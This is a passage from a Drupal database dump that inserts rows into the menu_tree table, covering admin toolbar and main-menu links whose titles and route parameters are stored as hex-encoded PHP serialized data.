('admin', 256, 'admin_toolbar_tools.extra_links:entity.media_type.delete_form.video', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.video', 'entity.media_type.delete_form', 'media_type=video', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22766964656f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 219, 251, 256, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 257, 'admin_toolbar_tools.extra_links:media_library', 'admin_toolbar_tools.extra_links:media_page', 'view.media_library.page', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d65646961206c696272617279223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 8, 216, 257, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 258, 'admin_toolbar_tools.extra_links:views_ui.media_library', 'entity.view.collection', 'entity.view.edit_form', 'view=media_library', 0x613a313a7b733a343a2276696577223b733a31333a226d656469615f6c696272617279223b7d, '', 0x733a31333a224d65646961206c696272617279223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 258, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 259, 'media_library.settings', 'system.admin_config_media', 'media_library.settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32323a224d65646961204c6962726172792073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33303a224d616e616765204d65646961204c6962726172792073657474696e67732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'media_library', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 23, 24, 259, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 260, 'captcha.settings', 'user.admin_index', 'captcha_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a22434150544348412073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32373a2241646d696e697374657220434150544348412073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'captcha', 1, 1, 0, -1, 0x613a303a7b7d, 1, 4, 6, 23, 49, 260, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 261, 'captcha.examples', 'captcha.settings', 'captcha_examples', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a2243415054434841206578616d706c6573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a36343a224f76657276696577206f662074686520617661696c61626c652043415054434841206368616c6c656e67652074797065732077697468206578616d706c657327223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'captcha', 1, 1, 0, 0, 0x613a303a7b7d, 0, 5, 6, 23, 49, 260, 261, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 262, 'image_captcha.settings', 'captcha.settings', 'image_captcha.settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22496d6167652043617074636861223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33333a22436f6e66696775726520496d61676520436170746368612053657474696e67732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'image_captcha', 1, 1, 0, -1, 0x613a303a7b7d, 0, 5, 6, 23, 49, 260, 262, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 263, 'entity.configurable_language.collection', 'system.admin_config_regional', 'entity.configurable_language.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a393a224c616e677561676573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a36323a22436f6e666967757265206c616e67756167657320666f7220636f6e74656e742c20696e746572666163652c20616e6420636f6e66696775726174696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'language', 1, 1, 0, 0, 0x613a303a7b7d, 1, 4, 6, 23, 35, 263, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 264, 'admin_toolbar_tools.extra_links:language.negotiation', 'entity.configurable_language.collection', 'language.negotiation', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32333a22446574656374696f6e20616e642073656c656374696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 5, 6, 23, 35, 263, 264, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 265, 'admin_toolbar_tools.extra_links:language.add', 'entity.configurable_language.collection', 'language.add', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22416464206c616e6775616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 5, 6, 23, 35, 263, 265, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm');
INSERT INTO `menu_tree` (`menu_name`, `mlid`, `id`, `parent`, `route_name`, `route_param_key`, `route_parameters`, `url`, `title`, `description`, `class`, `options`, `provider`, `enabled`, `discovered`, `expanded`, `weight`, `metadata`, `has_children`, `depth`, `p1`, `p2`, `p3`, `p4`, `p5`, `p6`, `p7`, `p8`, `p9`, `form_class`) VALUES
('admin', 266, 'language.content_settings_page', 'system.admin_config_regional', 'language.content_settings_page', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33323a22436f6e74656e74206c616e677561676520616e64207472616e736c6174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35353a22436f6e666967757265206c616e677561676520616e64207472616e736c6174696f6e20737570706f727420666f7220636f6e74656e742e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'language', 1, 1, 0, 10, 0x613a303a7b7d, 0, 4, 6, 23, 35, 266, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 267, 'config_translation.mapper_list', 'system.admin_config_regional', 'config_translation.mapper_list', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32353a22436f6e66696775726174696f6e207472616e736c6174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32383a225472616e736c6174652074686520636f6e66696775726174696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'config_translation', 1, 1, 0, 30, 0x613a303a7b7d, 0, 4, 6, 23, 35, 267, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 268, 'locale.translate_page', 'system.admin_config_regional', 'locale.translate_page', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32363a225573657220696e74657266616365207472616e736c6174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a38373a22436f6e6669677572652074686520696d706f7274206f66207472616e736c6174696f6e2066696c65732c20616e6420616464206f7220637573746f6d697a6520696e74657266616365207472616e736c6174696f6e732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'locale', 1, 1, 0, 15, 0x613a303a7b7d, 0, 4, 6, 23, 35, 268, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 269, 'locale.translate_status', 'system.admin_reports', 'locale.translate_status', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32393a22417661696c61626c65207472616e736c6174696f6e2075706461746573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a39373a22476574206120737461747573207265706f72742061626f757420617661696c61626c6520696e74657266616365207472616e736c6174696f6e7320666f7220796f757220696e7374616c6c6564206d6f64756c657320616e64207468656d65732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'locale', 1, 1, 0, 0, 0x613a303a7b7d, 0, 3, 6, 51, 269, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('main-menu', 270, 'menu_link_content:08138e1b-68c5-4bc9-bb62-e0fbd4e1a07f', 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 'entity.node.canonical', 'node=23', 0x613a313a7b733a343a226e6f6465223b733a323a223233223b7d, '', 0x733a31353a22436f6d70616e792050726f66696c65223b, NULL, 'Drupal\\menu_link_content\\Plugin\\Menu\\MenuLinkContent', 0x613a313a7b733a353a227175657279223b613a303a7b7d7d, 'menu_link_content', 1, 1, 0, -50, 0x613a313a7b733a393a22656e746974795f6964223b733a313a2235223b7d, 0, 2, 195, 270, 0, 0, 0, 0, 0, 0, 0, '\\Drupal\\menu_link_content\\Form\\MenuLinkContentForm'),
('main-menu', 271, 'menu_link_content:3cb23068-7e7e-44ef-9db2-b0dc9d43d379', 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 'entity.node.canonical', 'node=24', 0x613a313a7b733a343a226e6f6465223b733a323a223234223b7d, '', 0x733a31323a224f7572205365727669636573223b, NULL, 'Drupal\\menu_link_content\\Plugin\\Menu\\MenuLinkContent', 0x613a313a7b733a353a227175657279223b613a303a7b7d7d, 'menu_link_content', 1, 1, 0, -46, 0x613a313a7b733a393a22656e746974795f6964223b733a313a2236223b7d, 0, 2, 195, 271, 0, 0, 0, 0, 0, 0, 0, '\\Drupal\\menu_link_content\\Form\\MenuLinkContentForm'),
('main-menu', 272, 'menu_link_content:20767e32-de2b-41e9-83e9-2bd0d39d9f9a', 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 'entity.node.canonical', 'node=25', 0x613a313a7b733a343a226e6f6465223b733a323a223235223b7d, '', 0x733a31363a22566973696f6e2026204d697373696f6e223b, NULL, 'Drupal\\menu_link_content\\Plugin\\Menu\\MenuLinkContent', 0x613a313a7b733a353a227175657279223b613a303a7b7d7d, 'menu_link_content', 1, 1, 0, -47, 0x613a313a7b733a393a22656e746974795f6964223b733a313a2237223b7d, 0, 2, 195, 272, 0, 0, 0, 0, 0, 0, 0, '\\Drupal\\menu_link_content\\Form\\MenuLinkContentForm'),
('main-menu', 273, 'menu_link_content:73e0e9b4-9e96-45aa-83d2-94e731e38630', 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 'entity.node.canonical', 'node=26', 0x613a313a7b733a343a226e6f6465223b733a323a223236223b7d, '', 0x733a31313a2246757475726520476f616c223b, NULL, 'Drupal\\menu_link_content\\Plugin\\Menu\\MenuLinkContent', 0x613a313a7b733a353a227175657279223b613a303a7b7d7d, 'menu_link_content', 1, 1, 0, -48, 0x613a313a7b733a393a22656e746974795f6964223b733a313a2238223b7d, 0, 2, 195, 273, 0, 0, 0, 0, 0, 0, 0, '\\Drupal\\menu_link_content\\Form\\MenuLinkContentForm'),
('main-menu', 274, 'menu_link_content:72fe5b8c-23a4-4c6e-bb34-d644686ff24a', 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', 'entity.node.canonical', 'node=27', 0x613a313a7b733a343a226e6f6465223b733a323a223237223b7d, '', 0x733a31353a22436f6d70616e7920486973746f7279223b, NULL, 'Drupal\\menu_link_content\\Plugin\\Menu\\MenuLinkContent', 0x613a313a7b733a353a227175657279223b613a303a7b7d7d, 'menu_link_content', 1, 1, 0, -49, 0x613a313a7b733a393a22656e746974795f6964223b733a313a2239223b7d, 0, 2, 195, 274, 0, 0, 0, 0, 0, 0, 0, '\\Drupal\\menu_link_content\\Form\\MenuLinkContentForm'),
('admin', 275, 'admin_toolbar_tools.extra_links:views_ui.content_translations', 'entity.view.collection', 'entity.view.edit_form', 'view=content_translations', 0x613a313a7b733a343a2276696577223b733a32303a22636f6e74656e745f7472616e736c6174696f6e73223b7d, '', 0x733a32343a22436f6e74656e74207472616e736c6174696f6e206a6f6273223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 275, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 276, 'admin_toolbar_tools.extra_links:node.add.slider', 'admin_toolbar_tools.extra_links:node.add', 'node.add', 'node_type=slider', 0x613a313a7b733a393a226e6f64655f74797065223b733a363a22736c69646572223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a226e6f64655f74797065223b733a393a22656e746974795f6964223b733a363a22736c69646572223b7d, 0, 4, 6, 8, 77, 276, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 277, 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.slider', 'entity.node_type.collection', 'entity.node_type.edit_form', 'node_type=slider', 0x613a313a7b733a393a226e6f64655f74797065223b733a363a22736c69646572223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a226e6f64655f74797065223b733a393a22656e746974795f6964223b733a363a22736c69646572223b7d, 1, 4, 6, 10, 18, 277, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 278, 'admin_toolbar_tools.extra_links:entity.node.field_ui_fieldsslider', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.slider', 'entity.node.field_ui_fields', 'node_type=slider', 0x613a313a7b733a393a226e6f64655f74797065223b733a363a22736c69646572223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 18, 277, 278, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 279, 'admin_toolbar_tools.extra_links:entity.entity_form_display.node.defaultslider', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.slider', 'entity.entity_form_display.node.default', 'node_type=slider', 0x613a313a7b733a393a226e6f64655f74797065223b733a363a22736c69646572223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 18, 277, 279, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 280, 'admin_toolbar_tools.extra_links:entity.entity_view_display.node.default.slider', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.slider', 'entity.entity_view_display.node.default', 'node_type=slider', 0x613a313a7b733a393a226e6f64655f74797065223b733a363a22736c69646572223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 277, 280, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 281, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.node.default.slider', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.slider', 'entity.node_type.entity_permissions_form', 'node_type=slider', 0x613a313a7b733a393a226e6f64655f74797065223b733a363a22736c69646572223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 277, 281, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 282, 'admin_toolbar_tools.extra_links:entity.node_type.delete_form.slider', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.slider', 'entity.node_type.delete_form', 'node_type=slider', 0x613a313a7b733a393a226e6f64655f74797065223b733a363a22736c69646572223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 18, 277, 282, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 283, 'admin_toolbar_tools.extra_links:views_ui.slider', 'entity.view.collection', 'entity.view.edit_form', 'view=slider', 0x613a313a7b733a343a2276696577223b733a363a22736c69646572223b7d, '', 0x733a363a22736c69646572223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 283, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('main-menu', 284, 'menu_link_content:f4f34d05-545b-4755-a5c5-934ebbe95d41', 'menu_link_content:6bec1422-63fe-47ba-940d-fc00560c2bbe', 'view.announcement.page_1', 'view_id=announcement&display_id=page_1', 0x613a323a7b733a373a22766965775f6964223b733a31323a22616e6e6f756e63656d656e74223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b7d, '', 0x733a31323a22e3818ae79fa5e38289e3819b223b, NULL, 'Drupal\\menu_link_content\\Plugin\\Menu\\MenuLinkContent', 0x613a313a7b733a353a227175657279223b613a303a7b7d7d, 'menu_link_content', 1, 1, 0, -50, 0x613a313a7b733a393a22656e746974795f6964223b733a323a223130223b7d, 0, 2, 305, 284, 0, 0, 0, 0, 0, 0, 0, '\\Drupal\\menu_link_content\\Form\\MenuLinkContentForm'),
('admin', 285, 'we_megamenu.megamenu_listing:account', 'we_megamenu.admin', 'we_megamenu.admin.configure', 'menu_name=account', 0x613a313a7b733a393a226d656e755f6e616d65223b733a373a226163636f756e74223b7d, '', 0x733a31373a2255736572206163636f756e74206d656e75223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'we_megamenu', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 189, 285, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 286, 'we_megamenu.megamenu_listing:admin', 'we_megamenu.admin', 'we_megamenu.admin.configure', 'menu_name=admin', 0x613a313a7b733a393a226d656e755f6e616d65223b733a353a2261646d696e223b7d, '', 0x733a31343a2241646d696e697374726174696f6e223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'we_megamenu', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 189, 286, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 287, 'we_megamenu.megamenu_listing:footer', 'we_megamenu.admin', 'we_megamenu.admin.configure', 'menu_name=footer', 0x613a313a7b733a393a226d656e755f6e616d65223b733a363a22666f6f746572223b7d, '', 0x733a363a22466f6f746572223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'we_megamenu', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 189, 287, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 288, 'we_megamenu.megamenu_listing:main', 'we_megamenu.admin', 'we_megamenu.admin.configure', 'menu_name=main', 0x613a313a7b733a393a226d656e755f6e616d65223b733a343a226d61696e223b7d, '', 0x733a31353a224d61696e206e617669676174696f6e223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'we_megamenu', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 189, 288, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 289, 'we_megamenu.megamenu_listing:main-menu', 'we_megamenu.admin', 'we_megamenu.admin.configure', 'menu_name=main-menu', 0x613a313a7b733a393a226d656e755f6e616d65223b733a393a226d61696e2d6d656e75223b7d, '', 0x733a393a224d61696e204d656e75223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'we_megamenu', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 189, 289, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 290, 'we_megamenu.megamenu_listing:tools', 'we_megamenu.admin', 'we_megamenu.admin.configure', 'menu_name=tools', 0x613a313a7b733a393a226d656e755f6e616d65223b733a353a22746f6f6c73223b7d, '', 0x733a353a22546f6f6c73223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'we_megamenu', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 189, 290, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 291, 'admin_toolbar_tools.extra_links:block_content_page', 'system.admin_content', 'entity.block_content.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a22426c6f636b73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 8, 291, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
